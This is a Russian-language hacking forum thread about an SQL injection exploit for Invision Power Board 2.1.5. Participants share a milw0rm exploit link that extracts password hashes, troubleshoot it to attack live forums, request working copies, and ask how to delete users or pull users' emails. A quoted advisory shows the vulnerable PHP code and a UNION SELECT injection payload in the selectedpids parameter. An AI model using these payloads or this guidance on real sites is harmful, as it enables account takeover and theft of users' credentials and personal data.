Форумы SQL инъекция Invision Power Board 2.1.5

http://milw0rm.com/exploits/download/1733
Sql-Injection в IPB 2.1.5. Посимвольно выдирает пароль.

 

слышьте можете подсказать где в сплойте синтаксическая ошибка или что там,а то он не может ломать форумы
+(.

 

Go0o$E а что за бага?
target userid - это номер юзера которого хочу узнать пароль?

 

Attempting to extract password hash from database...
0Error: SQL error.
Что это зачит?

 

правильно, там фсе подробно описано.Фсе работает

 

Attempting to extract password hash from database...
000000000000000000000000000000 (вобщем куча нулей)
пропатчен шоль?

 

Смотри сорсы

 

Править его надо...

 

Мало того, в этом сплоите есть проверка на $resp->content !~ /there is no such member/i , что не сработает на русской версии форума

В общем, когда посмотрел респонз выяснилось, что личное сообщение не отправляется, т.к. не найден пользователь с тем номером, что я ввожу, и выводится постоянно 0. У кого нибудь работает?

 

А исправленный отлично работает и на русской версии

 

ну так выложи....исправленный....

 

TRes,кинь людям сорс.

 

Мдя, опять править...скажите хоть в какой строке ошибка...

 

Там не ошибка. Он и в исходном виде на английской версии IPB будет прекрасно работать. А на русской неисправленный сплоит выдает Post ошибку. На ветке же 2.0.х как раз и получаются нули вместо хеша.

 

а у меня вообще не запускается сплоит от milw0rm через cygwin :-(. Что там надо исправить? или дайте рабочую версию.

 

На русском 2.1.1 нет post-еррора, но нули вместо хеша, а на 2.1.5 post-error! Выложи плз рабочий!

 

как будет выглядеть sql команда на удаление пользователя с ником lol ?

 

Реално тестил на 2 1 4 , всё работает,но даёт только 0000000000000000, значить всё проходит, проста какаята фикса стоит ))

 

Invision Power Board v2.1.5 Remote SQL Injection

Filename :- func_mod.php
Functionname :- post_delete()
Lines :- 89 To 209

Bug Found By :- Devil-00

Greetz :-
Rock Master ^ Hackers Pal ^ n0m4rcy ^
www.securtygurus.net

Code:

if ( is_array( $id ) )
{
if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}
else
{
return FALSE;
}
}
else
{
if ( intval($id) )
{
$pid   = "=$id";
}
else
{
return FALSE;
}
}

When $id = array .. the code don't check it if ( INTVAL )

Code:

if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}

Then We Can Do SQL Injection Here >>

Code:

$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );

And Here >>

Code:

$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );

Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit Baaad

Exm. To Exploit

1- First Add 2 Post
2- Check It To Delete
3- Edit String Query By HTTPLiveHeader

Code:

act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete

 

Такой вопрос:Можно ли через sql инъект вытащить мыло из акка юзера на IPB?Или придется брутить его пароль?